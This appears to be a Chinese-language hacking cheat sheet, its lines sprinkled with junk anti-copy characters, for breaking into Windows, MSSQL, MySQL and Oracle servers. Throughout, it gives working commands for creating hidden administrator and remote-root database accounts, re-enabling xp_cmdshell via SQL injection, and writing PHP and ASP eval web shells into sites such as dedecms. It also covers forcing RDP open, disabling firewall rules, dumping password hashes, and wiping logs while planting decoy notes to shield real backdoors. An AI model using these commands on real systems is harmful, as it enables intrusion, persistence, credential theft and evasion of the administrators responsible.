x% @ p+ m U( f
1.net user administrator /passwordreq:no
! @0 n' M1 F+ R: F \! M" v; l7 x这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
+ W. }, n' b/ ?7 i6 z2.比较巧妙的建克隆号的步骤% ?6 ~3 I O K
先建一个user的用户
+ ]$ y, p7 v8 Q* Q然后导出注册表。然后在计算机管理里删掉5 Y! n! e# l0 ^) L) b6 A! Q
在导入,在添加为管理员组
; p* A0 r: V6 I, M3 ]4 f3.查radmin密码
8 J. y- K8 e: l9 Kreg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
4 K/ S* Y+ A$ i( Z, {4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
* A! r* x/ x5 I! S& L1 e建立一个"services.exe"的项% U4 F- c' f% @' l, c0 K
再在其下面建立(字符串值)" k7 O8 i9 \5 s* s! K# b
键值为mu ma的全路径 w3 D( |( h5 x1 a$ C3 n
5.runas /user:guest cmd7 e O( s- M6 F2 s0 y
测试用户权限!' ^$ y/ u9 o% F* X+ ^& @
6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
9 V( b, _& Z$ }+ `7.入侵后漏洞修补、痕迹清理,后门置放:
$ p1 O& s9 a7 _$ }: U1 g基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门" l) M( Q. p3 ~' r# [' V1 R7 Z
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
9 y3 P& [7 N" C& b
( E1 ]( A5 ~; sfor example
% R6 L7 [1 b- g( O1 w: e
5 ~5 f1 }3 U+ P$ Vdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'3 Y2 o3 R, f" i y( Q0 S, T/ L
0 x' l. M0 q2 N3 z
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
% U) l9 _7 r1 h2 q% Y6 y- l$ N
) ?* M: m/ j; q- Y5 T) _2 B9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
& ^3 F# w) b8 r" N8 k如果要启用的话就必须把他加到高级用户模式
1 }( N0 Q3 U( @0 S' E可以直接在注入点那里直接注入
, h0 @2 u% Y4 eid=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--8 ^; {1 \2 b1 s# b" V3 p
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
6 |. R7 j F1 ?) {或者7 \& |, w8 T L0 k
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'5 c' j6 l0 t2 u2 ?4 a
来恢复cmdshell。
2 P' [/ ?1 V% W8 t) R' {, Y. R- _, J9 c- A7 F1 Z+ ]2 E
分析器/ G" F# j6 _! X/ Z) O) H( a
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
+ f* L; |/ m& b* D8 H4 \然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")- c/ p; @; z( H' p& A+ w4 Y
10.xp_cmdshell新的恢复办法4 V# h Z5 C- Q2 S6 \3 ~$ {$ H
xp_cmdshell新的恢复办法1 x0 S# r( t( F! C% A& E
扩展储存过程被删除以后可以有很简单的办法恢复:, {8 N/ p) m7 q
删除; G( O" M! h9 [7 \* q
drop procedure sp_addextendedproc
( x3 ?0 Q( I0 W" }' Rdrop procedure sp_oacreate
! K: d9 p0 }8 y0 H9 F* [exec sp_dropextendedproc 'xp_cmdshell'
- V2 W% S7 r9 ]; S- j' P5 K
& K4 Y: O8 p9 k恢复- e" A6 L. n- v$ V, i" B: @
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
* E8 ^( }, l. y/ n+ M Fdbcc addextendedproc ("xp_cmdshell","xplog70.dll")
0 |9 P" J% [' D6 N0 o/ e4 c& y* V0 _( B8 K4 v. ]$ }
这样可以直接恢复,不用去管sp_addextendedproc是不是存在
) ]3 h! C* u) Y, H2 t7 ` w* k8 j$ e5 c6 I, r7 A1 Q, A( k
-----------------------------
' K( p( a9 g4 J E% B1 x9 @
* u0 e: i/ t. H9 s7 k8 O删除扩展存储过过程xp_cmdshell的语句:
- r \5 Q, I9 {exec sp_dropextendedproc 'xp_cmdshell'
# _; N, H2 ?; O9 E; B
5 r' V9 E% U5 v* ]( l/ k2 p恢复cmdshell的sql语句( j7 C' p) o7 ~1 c& u
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll': ^2 i1 i% o" t3 b* N; l' l% |, U
$ f; I1 @8 I! O
1 @+ _9 ^6 |6 O8 e; Q% q9 a开启cmdshell的sql语句. K, @5 m$ ~8 j7 K
9 H* T% ^* b' a, m
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll') Z6 ~1 |, i) v' R% e
/ E9 L' W" W& h1 @
判断存储扩展是否存在
% O& i& h3 J1 fselect count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
6 d- P$ x, O3 w# ?$ k返回结果为1就ok* ]0 L0 p, d. A F" [" N
5 p" l5 I# c$ l2 E' w" B1 w恢复xp_cmdshell. c% @/ j, B1 W/ R
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
, f- l- j; `/ Q& @( x3 w1 G2 d返回结果为1就ok4 U1 V1 y+ v5 F
4 G# [) ]! D Q! q
否则上传xplog7.0.dll1 g+ i& k/ ~! t
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'& e. w7 b, Y% e4 V) V7 I
3 I. Y% l/ A- f! {" Q
堵上cmdshell的sql语句, T/ `9 N+ l2 y$ r
sp_dropextendedproc "xp_cmdshel
* _+ t. K' L8 u; c; X9 p" d-------------------------
& Z& O- I# T" G* }+ p清除3389的登录记录用一条系统自带的命令:
& t% p+ ^! y; kreg delete "hkcu\Software\Microsoft\Terminal Server Client" /f
& l8 N$ x2 j" R3 c6 G( h( ^+ ?% L
& H, Y6 c) T+ b; k1 X然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
. u) j3 m( U- X5 e. A& }在 mysql里查看当前用户的权限0 X4 o. r7 R0 @2 I% N9 l# Q/ w
show grants for 4 L* _ y7 M" T: j, A
7 G: C2 \, N; H" i; n& s; u, ~ L以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。0 x/ Z% ]* X. ^/ {' R" X% e
. y5 K" r' n9 p3 [5 `0 \& H/ X; A9 G) \& Y. n
Create USER 'itpro'@'%' IDENTIFIED BY '123';
1 ]% [. G6 T5 q* i" q u$ ~9 c+ \* U$ o
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION) v8 K- |' n$ n+ O' ?
7 l9 O3 v7 u& {6 P; [5 g# m
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0: |, x7 |0 v, I& k) S K3 @
1 ?/ ]8 K6 S% [) n
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0; d8 ^+ _% ]& C m' D
0 n) y8 e* z+ j; r* V
搞完事记得删除脚印哟。) r4 n7 z9 g3 A0 @& v3 N8 [: b
' F) s$ d' R4 U9 p4 `" {
Drop USER 'itpro'@'%';/ f; b. L5 [- q8 m" X& _" c
( K* g! I5 v `# GDrop DATABASE IF EXISTS `itpro` ;
. t) @7 i+ |) A/ M; }
* o+ ? x; f9 s2 H% D5 |; T$ B当前用户获取system权限
& @; I) i* c' N% u- t8 Hsc Create SuperCMD binPath= "cmd /K start" type= own type= interact$ z, j R8 m: T, {2 F! q. T" ^
sc start SuperCMD
1 ~8 {9 z+ m: X+ _- t: Q' v程序代码2 T0 d! R, Z) ]0 v; E
<SCRIPT LANGUAGE="VBScript">
* ^( [# Q6 O5 ]8 A( Q7 [, V( \set wsnetwork=CreateObject("WSCRIPT.NETWORK")
2 g$ s8 w) D$ \; p* Z$ d! J. Qos="WinNT://"&wsnetwork.ComputerName
( x7 H5 y7 u9 b5 p+ _Set ob=GetObject(os)) J3 F' T0 B7 W2 R5 |8 F
Set oe=GetObject(os&"/Administrators,group")
! ?! T6 g% T9 z u+ O( JSet od=ob.Create("user","nosec")
9 j5 E0 s7 c# f. pod.SetPassword "123456abc!@#"- t& y! u/ {$ `1 {. g+ ]
od.SetInfo! { B h6 |1 e
Set of=GetObject(os&"/nosec",user)! a) o4 j1 _' o
oe.add os&"/nosec"
0 x0 K1 v3 p0 t6 c( F% W# y</Script>
7 P& }+ K) j* J4 _, q+ S<script language=javascript>window.close();</script>
{2 @/ t# V' z& {2 Z6 k
: ^* B+ q: r8 V2 }7 }6 j8 @! K: T) m1 J& T2 q6 h+ o
; e* {! B/ l7 J4 J& @- y
1 v: H' i& R3 G' d9 h
突破验证码限制入后台拿shell
" @& {; M/ k' s7 `8 w: I* A% [程序代码* [; x$ W* i+ j: e0 ~
REGEDIT4 ; N+ I7 S/ K5 e# v. D( _$ w
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] : N5 q2 U3 [$ t( ]! ^9 P
"BlockXBM"=dword:00000000) Y# W) j# |7 b' o* c
9 l5 }% F0 _9 @, _/ \保存为code.reg,导入注册表,重器IE! c3 ~1 G& Y: W1 O/ @
就可以了
8 V: m* ^) J3 ^; f, P0 G1 e0 C7 Xunion写马
4 x) B1 Q9 w$ l8 G0 F" e. Y" t程序代码9 d7 `7 _, v. f
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
4 s# [/ Y# P9 z3 u# y" K/ Q9 h6 k$ ]. X) b
应用在dedecms注射漏洞上,无后台写马! S- l) _9 K! J8 `1 E+ J
dedecms后台,无文件管理器,没有outfile权限的时候 q3 w: D d7 ?* x* E% o) p# F
在插件管理-病毒扫描里: F# A0 r% r# I2 ]$ i' I6 y
写一句话进include/config_hand.php里
$ u1 i$ C# \5 |; K% B( F程序代码
# Z/ ?( b: S4 f% u2 u" _4 [>';?><?php @eval($_POST[cmd]);?>% b( w; m; i6 y% U) z7 H/ ?2 B
! W- o, i$ v$ N) F
2 H1 \! a0 I. H9 @如上格式. T4 }6 Y6 h* }* |& E
; M8 Z" |4 y6 r- G9 ^) voracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
, ~% m4 V& p# G4 E5 |4 F程序代码1 D% E Z; a; G# l0 P8 ?& I
select username,password from dba_users;4 U D: Y- i! x! O5 t& V
3 R! L. n) T$ y6 e6 |# L
$ f) V# s$ H4 X* d, }, [1 X: hmysql远程连接用户
$ j" h9 _* G! K( A5 L) Y5 d1 U程序代码1 S* k7 A* ?" \( A2 o/ d
: M0 j/ u, b! pCreate USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
+ F l/ l1 I9 ^. aGRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION! C1 R0 |, }! G9 J& R# K8 x4 J
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0* N5 R) H/ y; {; b2 y% V2 r) I" c
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
* g6 U% u8 O7 z2 J: [* o2 g2 b7 K' t/ F
2 v9 t2 x g3 U% m0 z Y p# a8 s4 k1 w+ F7 m% {% y! L @
) h* ^2 X8 U( wecho y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
4 Z4 e c( Q7 R: p5 ^8 j' P' |& J8 d7 ~# [) @0 A. d
1.查询终端端口
& z: y2 \0 X6 x- w+ w% ^6 D0 n' ~# u- S( Z+ q# w
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber3 p7 A- b8 P" r6 q8 h
) L# E( o( T1 ]4 V
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"$ ?4 |0 l8 Q5 P- Z* H9 W
type tsp.reg
+ o4 W" m+ E# ^& ]2 e3 Q' H8 W: O' X& w; F2 m
2.开启XP&2003终端服务+ f$ J) Y- t) z& \9 J" N
+ \' j% c9 w! \
% a+ `# M9 f a; UREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
$ V% }: L- G; T' d3 U8 P& v0 L# H' D. N
' ^6 v2 U; Q2 {) {
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f0 n0 w9 f. V9 w1 s
; x1 Y( M9 ^# L1 Q
3.更改终端端口为20008(0x4E28)
V; y: A; m. m7 M
% a) P6 s; S' G) S% o& [REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f! x- n/ b: a% n6 }
7 b' n: h& }! B
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
7 z, B8 d$ _: W4 e# E7 v& {8 n( a/ \* ]
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
1 O9 Q* I" L" z! G6 b& @5 _
" R7 @4 _$ o/ t& y+ l) OREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f% { G) \" h& f% O- S! U
6 w' c9 g/ ?, C: K- Z, e& i7 I( q& a; f3 z- T
5.开启Win2000的终端,端口为3389(需重启)) v! ?3 Y7 s, ]
3 t8 z* \4 Z" m0 Pecho Windows Registry Editor Version 5.00 >2000.reg
) h, _# y$ D6 b* Pecho. >>2000.reg
7 M5 h# y/ S3 ?echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
2 f5 D! O+ D8 H+ ?/ Oecho "Enabled"="0" >>2000.reg ) ~3 w( c/ m1 e
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg ! O, S4 {/ x+ F. ~
echo "ShutdownWithoutLogon"="0" >>2000.reg
: c w' Q* O z& Yecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg 6 g# q, T3 V' Z1 H' L, q% o& m
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
% I% D2 }7 M/ x0 v0 C$ Aecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
1 Z+ d3 j2 A! S$ Decho "TSEnabled"=dword:00000001 >>2000.reg
" A6 P W- Z5 b z: P+ zecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg # j8 m2 N, v) ?) V& b6 G6 w
echo "Start"=dword:00000002 >>2000.reg
6 t7 ^3 X9 @9 recho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg & p2 e Y# x1 Y. [2 B
echo "Start"=dword:00000002 >>2000.reg
l# y$ `# K/ ]5 o+ B9 q- wecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg , A) D1 W5 \% `; K* X3 U9 T. [! ]
echo "Hotkey"="1" >>2000.reg J9 n9 P4 n- ]6 A4 M
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg 3 M" p! U6 v! c* ^4 ^/ L
echo "ortNumber"=dword:00000D3D >>2000.reg 3 X; V6 J. T* |* v" @
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg % Q" G9 ]" a* _- z
echo "ortNumber"=dword:00000D3D >>2000.reg+ V3 k5 U; {6 T- u- }1 w6 ^
9 ~: y- w' X/ z
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)( j) s3 v5 C" X p# h' v
7 }/ S& K% y! Z
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf' ?5 v. S# _1 l3 y* v+ e
(set inf=InstallHinfSection DefaultInstall)! [6 m4 R/ s* a( H
echo signature=$chicago$ >> restart.inf
{: b: K7 S' v' l) K& p1 g7 [echo [defaultinstall] >> restart.inf
# C' g- q2 X# R6 ?3 x" {rundll32 setupapi,%inf% 1 %temp%\restart.inf4 f3 U% m/ Q2 ~. a1 _" d v
- g' P9 l7 i4 j" ^ H5 ?2 M- h2 g) d. o! _$ J& P2 Z
7.禁用TCP/IP端口筛选 (需重启)! D+ R- _ U8 r2 V( g) W
B0 R/ E2 Y% {4 t0 W& VREG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f" r) V& c9 Y! c0 b1 T9 S1 T' Q: [. B
. m/ l5 e# n ~2 w) r: M$ d% h/ M
8.终端超出最大连接数时可用下面的命令来连接. p" \. b8 u& C/ m3 a6 g+ U
# H1 o* @% I/ [$ R3 g( C! R. Qmstsc /v:ip:3389 /console% v0 N' \; o5 p
n/ E5 a6 g. d7 k `: m9.调整NTFS分区权限" N1 E8 M/ Q8 n4 ^! {
5 Q7 _0 @! I% J% ?
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)5 Y9 N. ]* j% u/ Z# I5 |. Z- w/ r7 ]) F
. |% x H# T( t; o
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
& e6 w0 }" @6 |3 d* m H
) x: D' [2 W3 E4 g5 `# o------------------------------------------------------
% S7 U, e$ E [, U3389.vbs 1 s6 M; N* r4 ?9 I" ]) R% E
On Error Resume Next
# X3 R. \. R0 S8 \: p8 Y* c4 s4 econst HKEY_LOCAL_MACHINE = &H800000021 [7 y2 o) Q$ B! E4 b$ U
strComputer = "."
, x% V2 g1 {9 F! n/ t1 |/ [) oSet StdOut = WScript.StdOut
# P& p9 @2 w# R1 w+ m3 S) |, q: ^Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
2 H; u$ C1 f; dstrComputer & "\root\default:StdRegProv")" }) G: ?$ f7 M+ \ j2 g
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"4 s( K" e9 H- i$ `
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
& m1 ^1 I- p( D; J& n- g0 e( H* P) CstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"5 f p: B( ~, A$ Q6 z: ^3 g6 I f
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
) D# l! m4 y' d7 y8 H& FstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
8 W9 t* ~* A6 }2 B* u5 Y r/ ZstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"6 h, U8 a7 f* X; t8 F" B
strValueName = "fDenyTSConnections"
3 U w1 E B$ \dwValue = 0
% H! s4 I$ l$ ~# i# \# {0 Loreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue7 i3 p1 L6 g0 J$ X$ y. m
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
( B3 X6 ~2 W0 N9 N& e; r1 h4 T& X6 WstrValueName = "ortNumber"
' a' y/ ^) F$ [: d& N! ?( ] MdwValue = 3389
4 [0 A. m4 z( i" u. Eoreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
. q0 t. x5 q5 D$ s& U8 A8 R; ustrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"8 P; M' @( v9 A6 s) o# ^) _! W
strValueName = "ortNumber"( \) x: @4 Q, `! Q9 f+ w) j' y0 U
dwValue = 33898 s1 L6 @' B. z/ K# J
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue ^$ n$ S/ L2 b% f$ R. ^" g
Set R = CreateObject("WScript.Shell") . ?( t L" I! ?& P
R.run("Shutdown.exe -f -r -t 0")
- v m' U2 Z( @" w6 N' L( i- _+ Y
9 @9 J0 a! P! S9 m+ f0 W; U* _删除awgina.dll的注册表键值
& s# L4 y% w1 e0 p# I1 ^$ _+ N程序代码
- @1 Q$ _6 C$ K7 p
2 Y. _# O2 S9 ?& E; s% ?3 ~reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f" x) `; e e2 j9 X2 A" | Y
% k7 W" q7 l+ x5 U- I! P
/ V, f B: X( H! g6 [: h' E/ _7 k' o$ a: V. v4 z% A6 V3 x
, ^! Y5 ]" |) i2 n程序代码1 X& {$ f5 u- |4 u4 h# n! r
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash: [0 J6 Q1 M% ~: O$ Y# x
3 [8 b0 k, F' ]设置为1,关闭LM Hash/ T5 z8 a2 o* g- D6 \1 ]
3 o9 f8 }) L6 D9 V7 e. v数据库安全:入侵Oracle数据库常用操作命令4 {. M- e7 Y8 U9 e4 a8 K; e
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。
5 Z( \) c J {) g; }# A7 h1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。. m; n* R* Z3 j p9 n$ U: p# w
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;, h; Y+ V5 x& b2 a
3、SQL>connect / as sysdba ;(as sysoper)或
2 Y+ `+ p: t0 ?( p- G& M8 k! ?0 a* Kconnect internal/oracle AS SYSDBA ;(scott/tiger)+ c/ G+ U. k8 `: c8 c
conn sys/change_on_install as sysdba;
8 I5 w+ c8 }) N6 ]3 b8 n4、SQL>startup; 启动数据库实例
0 @8 z" z7 V/ J* w7 J. u$ H: k0 t0 V5、查看当前的所有数据库: select * from v$database;3 O: m$ p, k* P- x* G5 Z) |! }) }- ^
select name from v$database;
( e5 t* [1 b* j6 A& e7 Y6、desc v$databases; 查看数据库结构字段4 L+ q+ K& U+ y
7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:7 q( ~% Y$ H) t" X$ s' I: }
SQL>select * from V_$PWFILE_USERS;8 O/ ^5 g' [( t
Show user;查看当前数据库连接用户1 p6 }% X+ M0 z0 L1 y4 }
8、进入test数据库:database test;
+ t7 n7 p6 {% ]5 M5 E5 p( V% M9、查看所有的数据库实例:select * from v$instance;8 w9 S$ Y( @2 e* W, a* A+ }
如:ora9i
' w$ g: ]3 _# _; l10、查看当前库的所有数据表:( B1 d, g9 O/ i* i! D* a( C1 ~" V
SQL> select TABLE_NAME from all_tables;: g: {- C& K4 Z" Q- C1 g- Z
select * from all_tables;$ H; f- l( v7 ^! @: ?: _* `
SQL> select table_name from all_tables where table_name like '%u%';& c' @' [% Q6 b' }
TABLE_NAME
* g x* j. {" ^7 k------------------------------7 W, q: v. o$ c/ w
_default_auditing_options_6 N# Q8 N; h0 v
11、查看表结构:desc all_tables;
, w. o. C& u) S8 Z12、显示CQI.T_BBS_XUSER的所有字段结构:
) `, l- w$ V! ?; K" L l; Ldesc CQI.T_BBS_XUSER;$ X. {8 h9 O. {, \1 l8 T+ @
13、获得CQI.T_BBS_XUSER表中的记录: z! Z: T3 Y. g, Q
select * from CQI.T_BBS_XUSER;
9 D! [+ ?7 L9 c# \$ W14、增加数据库用户:(test11/test)
5 S$ m6 r. {8 f) F4 Rcreate user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
7 M% V7 `# A6 S15、用户授权:
& Y! y+ Y+ v. J. _, H' Q4 }: ygrant connect,resource,dba to test11;) k- f& L" ]. W( F
grant sysdba to test11;5 H8 P6 e. F# V
commit;8 a% z' k4 X1 b7 a. J+ \
16、更改数据库用户的密码:(将sys与system的密码改为test.)
9 p6 y+ ?+ @$ M+ r# ualter user sys indentified by test;1 }8 ~, g) b* p7 i$ m
alter user system indentified by test;
2 K0 V6 T/ g3 i$ v& U& r# Q0 j0 l5 ?
applicationContext-util.xml
, P [. J2 U2 u, W( GapplicationContext.xml
. k: J2 R2 E: z" astruts-config.xml# t& K- P% b2 ?( _' b! E- w& n! x
web.xml) k g5 M( w6 w5 Q8 D
server.xml, ~7 x/ b p0 S, Q$ B1 X* x
tomcat-users.xml, |3 Q# m f' p4 h
hibernate.cfg.xml
. D8 q" t; b0 @1 x U7 q i( \1 Mdatabase_pool_config.xml
& `! g, V9 x4 I3 X, \- L9 j) e$ j; k ^" m2 g! ^; F
7 D1 \8 _! E6 g3 J' ]\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置
% h, U! Q& h! z5 X# T\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini
9 ]# J6 v {, W F\WEB-INF\struts-config.xml 文件目录结构
( k1 V9 Z3 y5 L8 T# M: l8 h( ~( d! p; p7 A" Q4 e3 D2 @, }1 n' v
spring.properties 里边包含hibernate.cfg.xml的名称0 Z( O( a. Q+ P, S
2 A ^$ |4 E9 R4 Q+ h" t% C0 I, G
1 E% b- G. U, i y4 e7 Q% ^, lC:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
: v5 M2 b, x* o4 Z2 \' P7 S5 Q
% J( R+ [$ F6 t) H1 v( H" A7 X" U如果都找不到 那就看看class文件吧。。5 a: [ B. t/ Q
9 L& d1 O0 b: Z- g6 S
测试1:; _) E6 n/ k; F3 [- j
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
6 T; W! w# ^& j& w% O5 a& p' A( j$ |, i0 [
7 s) O( w! l; f1 B3 j% ]$ j+ X* Y U测试2:
0 l! L; F5 _4 ^- l1 ]* U" ]7 ], H6 c6 Q; m
create table dirs(paths varchar(100),paths1 varchar(100), id int)5 W, M m" s6 F. y* |
: r1 r8 s3 E) _9 S. c" y7 q1 h
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
7 M2 u8 u# N' I" i3 z- t
) C! Z% I) |/ t3 Z& TSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
5 t9 z g) {' J/ s; [) i
X5 A: M+ `% f Z; v9 n$ { |查看虚拟机中的共享文件:
) M" G' g7 `) K在虚拟机中的cmd中执行$ M( |, r* V3 G) B) n
\\.host\Shared Folders
% [% p% ~# g/ s% }, N
" ?7 T2 @- n T0 ecmdshell下找终端的技巧
5 N P& Y% R1 o2 ]4 [/ b找终端:
# E! u/ ~5 H6 Y8 t第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! 0 \- q; a: y3 W( F8 A
而终端所对应的服务名为:TermService
" y7 R. F$ B. \2 K& i第二步:用netstat -ano命令,列出所有端口对应的PID值!
& `0 L. S2 S* r1 D9 h/ w) P; E* h 找到PID值所对应的端口
7 m+ y9 T0 X, {# [% z% U: t' Z5 b8 q" B9 i: a1 d/ G6 F0 v
查询sql server 2005中的密码hash, C, m% `4 \3 ]: q
SELECT password_hash FROM sys.sql_logins where name='sa'3 [1 U( s! l, R4 e$ r- Q
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a8 n: I2 x! b' O* h; d
access中导出shell+ U, d3 c7 |3 a0 Q+ H0 \
% w% `6 V- g, k0 h; ]$ p
中文版本操作系统中针对mysql添加用户完整代码:( J4 u. S& g9 j
; j7 X ~; B) C* j4 O
